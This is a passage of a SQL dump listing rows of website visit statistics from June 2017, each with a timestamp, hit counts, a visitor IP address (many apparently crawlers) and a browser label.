,1,0,0,'217.182.132.96','other'),(121294,1497418359,1,1,0,0,'217.182.132.155','other'),(121295,1497418469,1,1,0,0,'91.196.178.35','chrome'),(121296,1497418884,1,1,0,0,'8.29.198.25','other'),(121297,1497419439,1,1,0,0,'91.196.178.68','firefox'),(121298,1497419612,1,0,1,0,'66.249.76.89',''),(121299,1497419633,1,1,0,0,'164.132.161.67','other'),(121300,1497419996,1,1,0,0,'51.255.71.129','other'),(121301,1497420182,1,1,0,0,'51.255.65.71','other'),(121302,1497420199,1,1,0,0,'217.182.132.66','other'),(121303,1497420467,1,0,1,0,'66.249.76.107',''),(121304,1497420799,1,1,0,0,'185.29.254.6','chrome'),(121305,1497420912,1,1,0,0,'217.182.132.21','other'),(121306,1497421780,1,1,0,0,'78.111.185.157','firefox'),(121307,1497421934,1,0,1,0,'66.249.76.108',''),(121308,1497422019,1,1,0,0,'5.196.87.175','other'),(121309,1497422324,1,1,0,0,'51.255.65.62','other'),(121310,1497422504,1,1,0,0,'51.255.65.93','other'),(121311,1497422668,1,1,0,0,'217.182.132.7','other'),(121312,1497422916,1,1,0,0,'92.112.109.230','chrome'),(121313,1497423114,1,1,0,0,'164.132.161.14','other'),(121314,1497423397,1,0,1,0,'66.249.66.76',''),(121315,1497423477,1,1,0,0,'167.114.233.118','firefox'),(121316,1497423478,1,1,0,0,'91.196.178.68','chrome'),(121317,1497423647,1,1,0,0,'180.76.15.149','other'),(121318,1497423729,1,1,0,0,'217.182.132.95','other'),(121319,1497423812,1,1,0,0,'217.182.132.35','other'),(121320,1497424164,1,1,0,0,'91.196.178.161','chrome'),(121321,1497424438,1,1,0,0,'51.255.65.22','other'),(121322,1497425093,1,1,0,0,'217.69.133.2','other'),(121323,1497425301,1,1,0,0,'217.182.132.170','other'),(121324,1497425324,1,1,0,0,'130.180.212.51','chrome'),(121325,1497425371,1,1,0,0,'91.196.178.70','firefox'),(121326,1497425583,1,0,1,0,'66.249.76.109',''),(121327,1497425830,1,1,0,0,'51.255.65.29','other'),(121328,1497425852,1,1,0,0,'137.74.207.110','other'),(121329,1497425962,1,1,0,0,'217.182.132.55','other'),(121330,1497426045,1,1,0,0,'164.132.161.85','other'),(121331,1497426100,1,1,0,0,'137.74.201.100','other'),(121332,1497426579,1,0,1,0,'66.249.76.107',''),(121333,1497427045,1,1,0,0,'91.196.178.71','other'),(121334,1497427141,1,1,0,0,'216.244.66.237','other'),(121335,1497427516,1,1,0,0,'164.132.161.35','other'),(121336,1497427723,1,1,0,0,'91.196.178.34','chrome'),(121337,1497428331,1,0,1,0,'66.249.76.108',''),(121338,1497428731,1,1,0,0,'95.108.213.25','other'),(121339,1497428735,1,1,0,0,'178.154.200.27','other'),(121340,1497428890,1,1,0,0,'51.255.65.50','other'),(121341,1497429130,1,1,0,0,'217.69.133.9','other'),(121342,1497429755,1,1,0,0,'8.29.198.27','other'),(121343,1497429941,1,1,0,0,'130.180.218.222','chrome'),(121344,1497429995,1,1,0,0,'51.255.65.22','other'),(121345,1497430520,1,1,0,0,'66.249.66.155','chrome'),(121346,1497431169,2,2,0,0,'91.196.178.68','chrome'),(121347,1497431373,2,2,0,0,'51.255.71.129','other'),(121348,1497431557,1,1,0,0,'46.101.6.174','chrome'),(121349,1497431688,1,1,0,0,'157.55.39.183','other'),(121350,1497431919,1,0,1,0,'66.249.76.91',''),(121351,1497432147,1,1,0,0,'5.196.87.171','other'),(121352,1497432177,1,1,0,0,'137.74.207.164','other'),(121353,1497432199,1,1,0,0,'66.249.76.93','chrome'),(121354,1497432213,1,0,1,0,'66.249.66.74',''),(121355,1497432226,1,1,0,0,'37.147.97.179','msie'),(121356,1497433005,1,0,1,0,'66.249.76.109',''),(121357,1497433276,1,1,0,0,'91.196.178.68','chrome'),(121358,1497433509,1,1,0,0,'51.255.65.92','other'),(121359,1497433664,1,1,0,0,'141.8.142.152','other'),(121360,1497433925,1,1,0,0,'51.255.65.33','other'),(121361,1497434377,1,1,0,0,'195.42.130.222','chrome'),(121362,1497434558,1,1,0,0,'51.255.65.64','other'),(121363,1497434598,1,1,0,0,'51.255.65.13','other'),(121364,1497434751,1,0,1,0,'66.249.66.74',''),(121365,1497435102,1,0,1,0,'66.249.76.93',''),(121366,1497435148,1,1,0,0,'95.158.3.84','chrome'),(121367,1497435189,1,1,0,0,'51.255.65.19','other'),(121368,1497435233,1,1,0,0,'91.196.178.34','chrome'),(121369,1497435601,1,1,0,0,'5.58.4.19','firefox'),(121370,1497435784,7,7,0,0,'5.255.253.54','other'),(121371,1497435786,4,4,0,0,'178.154.200.42','other'),(121372,1497436198,2,0,2,0,'66.249.76.107',''),(121373,1497436230,5,5,0,0,'80.108.38.43','other'),(121374,1497436350,1,1,0,0,'195.49.151.89','chrome'),(121375,1497436392,1,0,1,0,'66.249.76.93',''),(121376,1497437165,1,1,0,0,'31.43.2.136','firefox'),(121377,1497437182,1,1,0,0,'91.196.177.26','chrome'),(121378,1497437312,3,3,0,0,'5.255.253.54','other'),(121379,1497437357,1,1,0,0,'51.255.65.77','other'),(121380,1497437359,1,0,1,0,'66.249.76.109',''),(121381,1497437642,1,1,0,0,'217.69.133.9','other'),(121382,1497438316,1,1,0,0,'216.244.66.237','other'),(121383,1497438445,1,1,0,0,'217.182.132.192','other'),(121384,1497438781,1,1,0,0,'46.219.33.141','chrome'),(121385,1497438977,1,1,0,0,'31.43.2.136','firefox'),(121386,1497438986,1,1,0,0,'217.182.132.29','other'),(121387,1497439293,1,1,0,0,'66.249.76.93','chrome'),(121388,1497439309,1,0,1,0,'66.249.76.89',''),(121389,1497439656,1,1,0,0,'217.182.132.172','other'),(121390,1497439854,1,1,0,0,'217.182.132.181','other'),(121391,1497440138,2,2,0,0,'66.249.83.218','chrome'),(121392,1497440493,1,1,0,0,'66.249.66.155','chrome'),(121393,1497440593,1,1,0,0,'217.182.132.77','other'),(121394,1497440595,1,1,0,0,'217.69.133.2','other'),(121395,1497440614,1,1,0,0,'8.29.198.27','other'),(121396,1497441043,1,1,0,0,'164.132.161.83','other'),(121397,1497441467,1,1,0,0,'66.102.9.27','chrome'),(121398,1497441552,1,1,0,0,'217.182.132.67','other'),(121399,1497442156,1,0,1,0,'66.249.66.156',''),(121400,1497442164,1,1,0,0,'164.132.161.63','other'),(121401,1497442202,1,1,0,0,'217.182.132.69','other'),(121402,1497442674,1,1,0,0,'31.43.61.28','chrome'),(121403,1497442750,1,1,0,0,'94.179.64.67','chrome'),(121404,1497443381,1,1,0,0,'51.255.65.48','other'),(121405,1497443768,1,1,0,0,'164.132.164.180','other'),(121406,1497443966,1,1,0,0,'164.132.161.87','other'),(121407,1497444065,1,1,0,0,'164.132.162.157','other'),(121408,1497444421,2,2,0,0,'91.196.178.71','chrome'),(121409,1497444546,1,1,0,0,'157.55.39.183','other'),(121410,1497445028,1,1,0,0,'5.196.87.171','other'),(121411,1497445192,1,1,0,0,'217.182.132.179','other'),(121412,1497445241,1,1,0,0,'91.196.178.161','chrome'),(121413,1497445509,1,1,0,0,'217.182.132.57','other'),(121414,1497445551,1,1,0,0,'164.132.161.9','other'),(121415,1497445561,1,1,0,0,'92.113.191.138','chrome'),(121416,1497446602,1,1,0,0,'91.196.178.68','chrome'),(121417,1497446933,1,0,1,0,'66.249.76.91',''),(121418,1497447215,1,1,0,0,'51.255.65.92','other'),(121419,1497447692,1,1,0,0,'217.182.132.170','other'),(121420,1497447811,1,1,0,0,'164.132.161.37','other'),(121421,1497447946,1,1,0,0,'91.196.178.161','chrome'),(121422,1497448198,1,1,0,0,'5.255.253.54','other'),(121423,1497448292,1,1,0,0,'178.202.133.120','other'),(121424,1497448296,1,1,0,0,'51.255.65.33','other'),(121425,1497448576,1,1,0,0,'216.244.66.237','other'),(121426,1497448703,1,1,0,0,'164.132.161.33','other'),(121427,1497448751,1,1,0,0,'46.201.240.112','firefox'),(121428,1497449542,1,1,0,0,'217.182.132.174','other'),(121429,1497449566,1,1,0,0,'51.255.71.114','other'),(121430,1497449639,1,1,0,0,'157.55.39.178','other'),(121431,1497450155,1,1,0,0,'217.182.132.57','other'),(121432,1497450182,1,1,0,0,'91.196.177.46','chrome'),(121433,1497450569,1,1,0,0,'164.132.161.23','other'),(121434,1497450592,1,1,0,0,'217.182.132.20','other'),(121435,1497450916,1,1,0,0,'91.209.11.236','other'),(121436,1497451454,1,1,0,0,'8.29.198.26','other'),(121437,1497451624,1,0,1,0,'66.249.76.89',''),(121438,1497451629,1,1,0,0,'91.196.178.163','chrome'),(121439,1497451635,1,1,0,0,'164.132.161.27','other'),(121440,1497451815,1,1,0,0,'164.132.161.33','other'),(121441,1497451819,1,1,0,0,'95.108.213.25','other'),(121442,1497451833,2,2,0,0,'5.255.253.23','other'),(121443,1497452282,1,1,0,0,'141.8.142.152','other'),(121444,1497452373,1,1,0,0,'164.132.161.39','other'),(121445,1497452411,1,1,0,0,'91.196.178.68','firefox'),(121446,1497452539,1,1,0,0,'217.182.132.35','other'),(121447,1497452644,1,1,0,0,'91.209.11.236','other'),(121448,1497452647,1,1,0,0,'141.8.132.47','other'),(121449,1497452702,1,1,0,0,'91.196.177.44','chrome'),(121450,1497453274,1,0,1,0,'66.249.76.109',''),(121451,1497453358,1,1,0,0,'164.132.161.56','other'),(121452,1497453534,1,1,0,0,'164.132.161.64','other'),(121453,1497453913,1,1,0,0,'51.255.71.123','other'),(121454,1497453926,1,1,0,0,'51.255.71.129','other'),(121455,1497454206,1,1,0,0,'217.182.132.16','other'),(121456,1497454303,2,2,0,0,'91.209.11.236','other'),(121457,1497454498,1,1,0,0,'217.182.132.82','other'),(121458,1497454642,1,1,0,0,'51.255.71.131','other'),(121459,1497454924,1,1,0,0,'217.69.133.203','other'),(121460,1497454955,1,1,0,0,'164.132.161.65','other'),(121461,1497455074,1,1,0,0,'37.9.113.11','other'),(121462,1497455186,1,0,1,0,'66.249.76.109',''),(121463,1497455439,1,1,0,0,'217.182.132.191','other'),(121464,1497455547,1,1,0,0,'5.255.253.54','other'),(121465,1497455902,1,1,0,0,'157.55.39.183','other'),(121466,1497455905,2,2,0,0,'91.209.11.236','other'),(121467,1497456077,1,1,0,0,'217.182.132.146','other'),(121468,1497456269,1,1,0,0,'5.196.87.172','other'),(121469,1497456372,1,1,0,0,'51.255.65.11','other'),(121470,1497456419,1,1,0,0,'164.132.161.61','other'),(121471,1497456698,1,1,0,0,'188.255.17.134','msie'),(121472,1497456862,1,1,0,0,'217.182.132.30','other'),(121473,1497456920,1,0,1,0,'66.249.66.195',''),(121474,1497457592,1,1,0,0,'164.132.161.77','other'),(121475,1497457689,2,2,0,0,'91.209.11.236','other'),(121476,1497457764,1,1,0,0,'164.132.161.16','other'),(121477,1497458312,1,1,0,0,'91.196.178.38','chrome'),(121478,1497458708,1,1,0,0,'164.132.161.77','other'),(121479,1497458730,1,1,0,0,'51.255.71.126','other'),(121480,1497458741,1,1,0,0,'137.74.207.102','other'),(121481,1497458796,1,0,1,0,'66.249.76.89',''),(121482,1497458862,1,1,0,0,'217.182.132.29','other'),(121483,1497458926,1,1,0,0,'51.255.71.133','other'),(121484,1497459120,1,1,0,0,'216.244.66.237','other'),(121485,1497459988,1,1,0,0,'91.209.11.236','other'),(121486,1497460384,1,1,0,0,'164.132.161.35','other'),(121487,1497461057,1,0,1,0,'66.249.76.91',''),(121488,1497461285,1,1,0,0,'46.200.112.194','firefox'),(121489,1497461353,1,0,1,0,'68.180.230.48',''),(121490,1497462115,1,1,0,0,'180.76.15.6','other'),(121491,1497462317,1,1,0,0,'8.29.198.27','other'),(121492,1497462717,1,1,0,0,'51.255.65.16','other'),(121493,1497462765,1,1,0,0,'51.255.65.49','other'),(121494,1497463289,1,1,0,0,'5.254.65.114','chrome'),(121495,1497463504,1,1,0,0,'217.182.132.152','other'),(121496,1497463763,2,2,0,0,'217.182.132.191','other'),(121497,1497464023,1,1,0,0,'164.132.161.72','other'),(121498,1497464219,1,1,0,0,'164.132.161.15','other'),(121499,1497464377,1,1,0,0,'217.182.132.50','other'),(121500,1497464448,1,1,0,0,'40.77.167.101','other'),(121501,1497465004,1,1,0,0,'164.132.161.90','other'),(121502,1497465561,1,1,0,0,'46.133.6.128','chrome'),(121503,1497465944,1,1,0,0,'5.255.253.16','other'),(121504,1497465947,1,1,0,0,'95.108.181.27','other'),(121505,1497465951,1,1,0,0,'178.154.200.67','other'),(121506,1497465955,1,1,0,0,'141.8.142.39','other'),(121507,1497466864,2,2,0,0,'164.132.161.3','other'),(121508,1497467238,1,0,1,0,'66.249.76.108',''),(121509,1497467307,1,1,0,0,'217.182.132.29','other'),(121510,1497467495,1,1,0,0,'141.8.142.39','other'),(121511,1497467745,1,1,0,0,'193.165.158.110','chrome'),(121512,1497467896,1,1,0,0,'51.255.65.47','other'),(121513,1497468218,1,1,0,0,'217.182.132.25','other'),(121514,1497468221,1,1,0,0,'216.244.66.237','other'),(121515,1497468453,1,1,0,0,'51.255.65.33','other'),(121516,1497468499,5,5,0,0,'192.187.123.162','other'),(121517,1497468668,1,1,0,0,'157.55.39.178','other'),(121518,1497468764,1,1,0,0,'5.196.87.172','other'),(121519,1497469254,1,1,0,0,'40.77.167.101','other'),(121520,1497469876,1,1,0,0,'217.182.132.55','other'),(121521,1497470277,1,1,0,0,'157.55.39.178','other'),(121522,1497470295,1,0,1,0,'66.249.66.157',''),(121523,1497470680,1,1,0,0,'46.211.97.50','chrome'),(121524,1497470732,1,1,0,0,'164.132.161.26','other'),(121525,1497470966,1,1,0,0,'217.182.132.181','other'),(121526,1497471261,1,1,0,0,'164.132.161.50','other'),(121527,1497471273,1,1,0,0,'51.255.65.59','other'),(121528,1497471487,1,1,0,0,'51.255.65.44','other'),(121529,1497471604,1,0,1,0,'66.249.76.91',''),(121530,1497471730,1,1,0,0,'164.132.161.58','other'),(121531,1497471733,1,1,0,0,'46.211.97.50','chrome'),(121532,1497471856,1,1,0,0,'164.132.161.13','other'),(121533,1497471866,1,1,0,0,'157.55.39.178','other'),(121534,1497471974,1,1,0,0,'93.175.236.51','firefox'),(121535,1497472147,1,1,0,0,'66.249.76.108','chrome'),(121536,1497472156,1,1,0,0,'91.196.178.163','chrome'),(121537,1497472222,1,1,0,0,'51.255.65.68','other'),(121538,1497472240,1,1,0,0,'46.165.197.141','other'),(121539,1497472484,1,1,0,0,'217.182.132.193','other'),(121540,1497472694,1,1,0,0,'164.132.161.12','other'),(121541,1497473040,1,1,0,0,'51.255.65.94','other'),(121542,1497473163,1,1,0,0,'8.29.198.26','other'),(121543,1497473336,1,1,0,0,'51.255.65.26','other'),(121544,1497473361,1,1,0,0,'46.48.13.161','chrome'),(121545,1497473484,1,1,0,0,'66.249.76.109','chrome'),(121546,1497473574,1,1,0,0,'164.132.161.43','other'),(121547,1497473624,1,1,0,0,'164.132.161.35','other'),(121548,1497474103,1,1,0,0,'164.132.162.156','other'),(121549,1497474283,1,1,0,0,'40.77.167.101','other'),(121550,1497474323,1,0,1,0,'66.249.66.195',''),(121551,1497474437,1,1,0,0,'51.255.71.100','other'),(121552,1497474495,1,1,0,0,'217.182.132.80','other'),(121553,1497474501,1,1,0,0,'212.90.60.83','firefox'),(121554,1497474986,1,1,0,0,'217.182.132.27','other'),(121555,1497475036,1,1,0,0,'217.69.133.9','other'),(121556,1497475215,1,1,0,0,'217.182.132.63','other'),(121557,1497475456,1,1,0,0,'157.55.39.183','other'),(121558,1497475489,1,1,0,0,'164.132.162.158','other'),(121559,1497475964,1,1,0,0,'91.218.195.33','chrome'),(121560,1497475996,1,0,1,0,'66.249.66.157',''),(121561,1497476129,1,1,0,0,'164.132.161.70','other'),(121562,1497476966,1,1,0,0,'217.182.132.97','other'),(121563,1497477371,1,1,0,0,'91.218.195.33','chrome'),(121564,1497477594,1,1,0,0,'217.182.132.63','other'),(121565,1497477847,1,1,0,0,'217.182.132.178','other'),(121566,1497478018,1,1,0,0,'137.74.207.108','other'),(121567,1497478874,1,1,0,0,'216.244.66.237','other'),(121568,1497479280,1,1,0,0,'164.132.161.31','other'),(121569,1497479577,1,1,0,0,'51.255.65.64','other'),(121570,1497479724,1,0,1,0,'68.180.230.48',''),(121571,1497480096,1,1,0,0,'51.255.65.63','other'),(121572,1497480202,1,1,0,0,'217.182.132.87','other'),(121573,1497480549,1,1,0,0,'5.196.87.174','other'),(121574,1497480750,1,0,1,0,'66.249.66.195',''),(121575,1497480985,1,1,0,0,'51.255.65.16','other'),(121576,1497481557,1,1,0,0,'51.255.65.60','other'),(121577,1497481746,1,1,0,0,'91.209.11.236','other'),(121578,1497481758,1,0,1,0,'66.249.76.109',''),(121579,1497482267,1,1,0,0,'51.255.65.83','other'),(121580,1497482946,1,0,1,0,'66.249.76.109',''),(121581,1497483212,1,1,0,0,'157.55.39.178','other'),(121582,1497483982,1,0,1,0,'68.180.230.48',''),(121583,1497484007,1,1,0,0,'8.29.198.25','other'),(121584,1497484547,2,0,2,0,'66.249.76.108',''),(121585,1497484913,1,0,1,0,'66.249.76.91',''),(121586,1497485283,1,0,1,0,'66.249.66.195',''),(121587,1497485583,1,0,1,0,'66.249.76.109',''),(121588,1497485679,1,1,0,0,'217.182.132.150','other'),(121589,1497485806,1,1,0,0,'66.249.76.89','chrome'),(121590,1497485904,1,1,0,0,'51.255.65.41','other'),(121591,1497485932,1,1,0,0,'51.255.65.25','other'),(121592,1497486438,1,1,0,0,'141.8.142.134','other'),(121593,1497486446,2,2,0,0,'5.255.253.54','other'),(121594,1497486450,1,1,0,0,'141.8.132.49','other'),(121595,1497486497,1,1,0,0,'37.9.113.11','other'),(121596,1497486717,2,0,2,0,'66.249.76.91',''),(121597,1497486839,1,1,0,0,'178.154.200.42','other'),(121598,1497486886,1,1,0,0,'164.132.161.74','other'),(121599,1497486919,1,1,0,0,'217.182.132.192','other'),(121600,1497487234,1,1,0,0,'164.132.161.71','other'),(121601,1497487317,1,1,0,0,'164.132.162.160','other'),(121602,1497487417,1,1,0,0,'51.255.65.65','other'),(121603,1497487579,1,1,0,0,'217.182.132.240','other'),(121604,1497488190,1,1,0,0,'95.221.205.186','firefox'),(121605,1497488376,1,1,0,0,'164.132.161.38','other'),(121606,1497488475,1,0,1,0,'66.249.76.108',''),(121607,1497488603,1,1,0,0,'217.182.132.94','other'),(121608,1497488844,1,1,0,0,'51.255.65.49','other'),(121609,1497488890,1,1,0,0,'164.132.161.67','other'),(121610,1497488951,1,1,0,0,'51.255.65.87','other'),(121611,1497489063,1,1,0,0,'51.255.65.47','other'),(121612,1497489804,1,1,0,0,'157.55.39.178','other'),(121613,1497489992,3,3,0,0,'62.210.251.247','other'),(121614,1497490167,1,1,0,0,'157.55.39.183','other'),(121615,1497490349,1,0,1,0,'66.249.76.109',''),(121616,1497490518,1,1,0,0,'164.132.161.44','other'),(121617,1497491271,1,1,0,0,'217.182.132.59','other'),(121618,1497491572,1,1,0,0,'51.255.65.66','other'),(121619,1497491878,1,1,0,0,'180.76.15.18','other'),(121620,1497491901,1,1,0,0,'217.182.132.191','other'),(121621,1497492516,1,1,0,0,'217.182.132.18','other'),(121622,1497492620,1,1,0,0,'51.255.71.132','other'),(121623,1497492822,1,1,0,0,'51.255.65.71','other'),(121624,1497492870,1,1,0,0,'217.182.132.70','other'),(121625,1497492925,1,1,0,0,'164.132.161.7','other'),(121626,1497493003,1,1,0,0,'51.255.71.119','other'),(121627,1497493179,1,1,0,0,'164.132.161.90','other'),(121628,1497493271,1,1,0,0,'5.196.87.175','other'),(121629,1497493365,1,1,0,0,'217.182.132.23','other'),(121630,1497493522,1,1,0,0,'217.182.132.155','other'),(121631,1497493918,1,1,0,0,'217.69.133.203','other'),(121632,1497493963,1,1,0,0,'164.132.161.70','other'),(121633,1497494033,1,0,1,0,'68.180.230.48',''),(121634,1497494225,1,1,0,0,'137.74.207.116','other'),(121635,1497494445,1,0,1,0,'66.249.76.108',''),(121636,1497494569,1,0,1,0,'66.249.76.91',''),(121637,1497494605,1,1,0,0,'217.182.132.156','other'),(121638,1497494615,1,1,0,0,'164.132.161.37','other'),(121639,1497494713,1,1,0,0,'217.182.132.177','other'),(121640,1497494727,1,1,0,0,'66.249.76.93','chrome'),(121641,1497494850,1,1,0,0,'8.29.198.27','other'),(121642,1497495194,1,1,0,0,'217.182.132.63','other'),(121643,1497495409,1,1,0,0,'51.255.65.16','other'),(121644,1497495748,1,1,0,0,'51.255.65.97','other'),(121645,1497495756,1,1,0,0,'164.132.161.74','other'),(121646,1497496138,1,1,0,0,'66.249.76.109','chrome'),(121647,1497496484,1,1,0,0,'188.32.131.197','msie'),(121648,1497496873,1,1,0,0,'51.255.65.53','other'),(121649,1497497486,1,1,0,0,'164.132.161.80','other'),(121650,1497497758,1,0,1,0,'66.249.76.91',''),(121651,1497497760,1,0,1,0,'66.249.66.156',''),(121652,1497497761,1,1,0,0,'51.255.71.123','other'),(121653,1497498641,1,1,0,0,'137.74.207.109','other'),(121654,1497498896,1,1,0,0,'51.255.71.120','other'),(121655,1497499367,1,1,0,0,'176.31.231.10','other'),(121656,1497499643,1,1,0,0,'164.132.161.67','other'),(121657,1497499985,1,0,1,0,'66.249.76.93',''),(121658,1497500341,1,0,1,0,'66.249.76.108',''),(121659,1497500702,1,1,0,0,'217.182.132.37','other'),(121660,1497500853,1,1,0,0,'217.182.132.57','other'),(121661,1497501318,1,1,0,0,'91.196.178.65','firefox'),(121662,1497502036,1,1,0,0,'51.255.65.52','other'),(121663,1497502235,1,1,0,0,'66.249.66.157','chrome'),(121664,1497502247,1,1,0,0,'217.182.132.153','other'),(121665,1497502907,1,0,1,0,'66.249.76.108',''),(121666,1497503616,1,1,0,0,'164.132.161.57','other'),(121667,1497504130,1,0,1,0,'68.180.230.48',''),(121668,1497504188,1,1,0,0,'91.196.177.44','chrome'),(121669,1497504371,1,1,0,0,'51.255.65.40','other'),(121670,1497504635,1,1,0,0,'66.249.76.108','chrome'),(121671,1497504786,1,1,0,0,'51.255.65.86','other'),(121672,1497505052,1,0,1,0,'66.249.66.158',''),(121673,1497505109,1,1,0,0,'51.255.65.52','other'),(121674,1497505272,1,1,0,0,'5.196.87.174','other'),(121675,1497505316,1,0,1,0,'66.249.76.107',''),(121676,1497505491,1,1,0,0,'188.166.84.224','chrome'),(121677,1497505505,1,1,0,0,'178.154.200.42','other'),(121678,1497505508,1,1,0,0,'164.132.161.79','other'),(121679,1497505700,1,1,0,0,'8.29.198.25','other'),(121680,1497506138,1,1,0,0,'157.55.39.178','other'),(121681,1497506246,1,0,1,0,'66.249.76.93',''),(121682,1497506320,1,0,1,0,'66.249.66.201',''),(121683,1497506321,1,1,0,0,'208.43.225.84','other'),(121684,1497506485,8,8,0,0,'192.187.100.58','firefox'),(121685,1497506486,2,2,0,0,'192.187.100.58','msie'),(121686,1497506593,1,1,0,0,'217.69.133.6','other'),(121687,1497506646,1,1,0,0,'164.132.161.53','other'),(121688,1497506772,1,1,0,0,'51.255.71.115','other'),(121689,1497506993,1,1,0,0,'51.255.65.51','other'),(121690,1497507081,1,1,0,0,'91.196.178.68','chrome'),(121691,1497507413,1,1,0,0,'217.182.132.86','other'),(121692,1497507578,1,1,0,0,'217.182.132.175','other'),(121693,1497507751,1,1,0,0,'51.255.71.101','other'),(121694,1497507793,1,0,1,0,'68.180.230.48',''),(121695,1497507889,1,1,0,0,'40.77.167.101','other'),(121696,1497508989,1,1,0,0,'178.92.151.189','chrome'),(121697,1497509229,2,2,0,0,'54.165.59.7','other'),(121698,1497509286,1,1,0,0,'217.182.132.87','other'),(121699,1497509325,1,1,0,0,'66.249.76.93','chrome'),(121700,1497509533,3,3,0,0,'217.69.133.4','other'),(121701,1497509758,1,1,0,0,'91.196.179.25','chrome'),(121702,1497509775,1,1,0,0,'164.132.161.34','other'),(121703,1497509813,1,1,0,0,'91.196.178.68','chrome'),(121704,1497510078,1,1,0,0,'66.249.76.109','chrome'),(121705,1497510101,2,1,1,0,'66.249.76.91',''),(121706,1497510104,1,0,1,0,'66.249.76.107',''),(121707,1497510281,1,1,0,0,'54.165.59.7','other'),(121708,1497510371,1,1,0,0,'91.196.178.68','firefox'),(121709,1497510920,1,0,1,0,'66.249.66.157',''),(121710,1497510933,1,1,0,0,'51.255.71.117','other'),(121711,1497511155,1,1,0,0,'164.132.161.10','other'),(121712,1497511460,1,1,0,0,'151.80.27.118','other'),(121713,1497511475,1,0,1,0,'66.249.76.91',''),(121714,1497511499,1,1,0,0,'217.182.132.77','other'),(121715,1497511511,1,1,0,0,'37.53.90.175','chrome'),(121716,1497511669,1,1,0,0,'37.54.174.12','chrome'),(121717,1497512020,1,1,0,0,'217.182.132.146','other'),(121718,1497512109,1,1,0,0,'217.182.132.60','other'),(121719,1497512409,1,1,0,0,'164.132.161.87','other'),(121720,1497512440,1,1,0,0,'217.182.132.32','other'),(121721,1497512743,1,1,0,0,'164.132.161.44','other'),(121722,1497512977,1,1,0,0,'83.149.126.98','other'),(121723,1497513003,1,1,0,0,'164.132.161.38','other'),(121724,1497513554,1,1,0,0,'141.8.132.47','other'),(121725,1497514024,1,1,0,0,'51.255.65.50','other'),(121726,1497514045,1,1,0,0,'217.182.132.177','other'),(121727,1497514134,1,1,0,0,'51.255.71.110','other'),(121728,1497514613,2,2,0,0,'141.8.142.134','other'),(121729,1497514622,1,1,0,0,'5.255.253.54','other'),(121730,1497514634,1,1,0,0,'141.8.132.49','other'),(121731,1497514914,1,1,0,0,'217.182.132.28','other'),(121732,1497514947,1,1,0,0,'51.255.65.66','other'),(121733,1497515036,1,1,0,0,'164.132.161.37','other'),(121734,1497515546,1,1,0,0,'91.196.177.15','chrome'),(121735,1497515668,1,1,0,0,'94.178.153.155','chrome'),(121736,1497515686,1,1,0,0,'51.255.71.110','other'),(121737,1497515715,1,1,0,0,'91.196.179.33','firefox'),(121738,1497515833,1,0,1,0,'66.249.76.109',''),(121739,1497516128,1,1,0,0,'5.255.253.45','other'),(121740,1497516202,1,1,0,0,'178.154.200.70','other'),(121741,1497516250,5,5,0,0,'141.8.142.152','other'),(121742,1497516272,1,1,0,0,'93.158.152.14','other'),(121743,1497516283,1,0,1,0,'66.249.66.201',''),(121744,1497516297,3,3,0,0,'141.8.132.49','other'),(121745,1497516348,1,1,0,0,'87.250.224.21','other'),(121746,1497516382,1,1,0,0,'178.154.200.42','other'),(121747,1497516393,4,4,0,0,'5.255.253.54','other'),(121748,1497516404,2,2,0,0,'141.8.142.134','other'),(121749,1497516423,3,3,0,0,'5.255.253.23','other'),(121750,1497516521,1,1,0,0,'141.8.132.47','other'),(121751,1497516543,1,1,0,0,'8.29.198.26','other'),(121752,1497516557,1,1,0,0,'37.9.113.11','other'),(121753,1497516576,1,1,0,0,'5.255.253.27','other'),(121754,1497516661,1,1,0,0,'82.207.27.3','firefox'),(121755,1497516872,1,1,0,0,'62.80.183.205','chrome'),(121756,1497516971,1,1,0,0,'51.255.65.14','other'),(121757,1497517329,1,1,0,0,'164.132.161.29','other'),(121758,1497517431,1,1,0,0,'51.255.65.33','other'),(121759,1497517580,1,1,0,0,'51.255.65.83','other'),(121760,1497517670,1,1,0,0,'66.102.9.25','chrome'),(121761,1497517851,1,0,1,0,'68.180.230.48',''),(121762,1497517929,1,0,1,0,'66.249.76.107',''),(121763,1497518663,1,1,0,0,'164.132.161.78','other'),(121764,1497518764,1,1,0,0,'217.182.132.7','other'),(121765,1497518913,1,1,0,0,'164.132.161.71','other'),(121766,1497519116,1,1,0,0,'164.132.161.73','other'),(121767,1497519230,1,1,0,0,'66.249.76.93','chrome'),(121768,1497519231,1,1,0,0,'164.132.161.35','other'),(121769,1497519233,1,0,1,0,'66.249.76.89',''),(121770,1497519248,1,1,0,0,'51.255.65.35','other'),(121771,1497519462,1,1,0,0,'164.132.161.27','other'),(121772,1497519521,1,1,0,0,'5.196.87.174','other'),(121773,1497519626,1,1,0,0,'51.255.65.97','other'),(121774,1497519668,1,1,0,0,'217.182.132.191','other'),(121775,1497519863,1,1,0,0,'66.249.66.158','chrome'),(121776,1497520041,1,1,0,0,'217.182.132.32','other'),(121777,1497520188,1,1,0,0,'91.196.177.46','firefox'),(121778,1497520242,1,1,0,0,'91.196.178.162','chrome'),(121779,1497520323,1,1,0,0,'93.75.32.13','firefox'),(121780,1497520386,1,1,0,0,'217.182.132.92','other'),(121781,1497520674,1,1,0,0,'164.132.161.65','other'),(121782,1497520809,1,1,0,0,'91.196.178.135','firefox'),(121783,1497521166,1,1,0,0,'217.182.132.75','other'),(121784,1497521467,1,0,1,0,'66.249.66.157',''),(121785,1497521555,1,0,1,0,'68.180.230.48',''),(121786,1497521571,1,1,0,0,'66.249.76.93','chrome'),(121787,1497521751,1,1,0,0,'91.219.144.98','chrome'),(121788,1497522056,1,1,0,0,'51.255.65.95','other'),(121789,1497522145,1,1,0,0,'164.132.161.56','other'),(121790,1497522548,1,1,0,0,'137.74.207.164','other'),(121791,1497522843,1,1,0,0,'164.132.161.45','other'),(121792,1497522906,1,0,1,0,'66.249.76.107',''),(121793,1497522966,1,1,0,0,'91.196.178.65','chrome'),(121794,1497523088,1,1,0,0,'164.132.161.71','other'),(121795,1497523485,1,1,0,0,'164.132.161.39','other'),(121796,1497523505,1,0,1,0,'66.249.66.199',''),(121797,1497523836,1,1,0,0,'51.255.71.129','other'),(121798,1497523966,1,1,0,0,'217.69.133.194','other'),(121799,1497524091,1,1,0,0,'216.244.66.237','other'),(121800,1497524112,1,0,1,0,'66.249.76.109',''),(121801,1497524329,1,1,0,0,'164.132.161.66','other'),(121802,1497524553,1,1,0,0,'217.182.132.97','other'),(121803,1497525397,1,1,0,0,'5.9.63.162','other'),(121804,1497525655,1,1,0,0,'91.196.178.65','chrome'),(121805,1497525694,1,0,1,0,'66.249.76.93',''),(121806,1497525815,1,1,0,0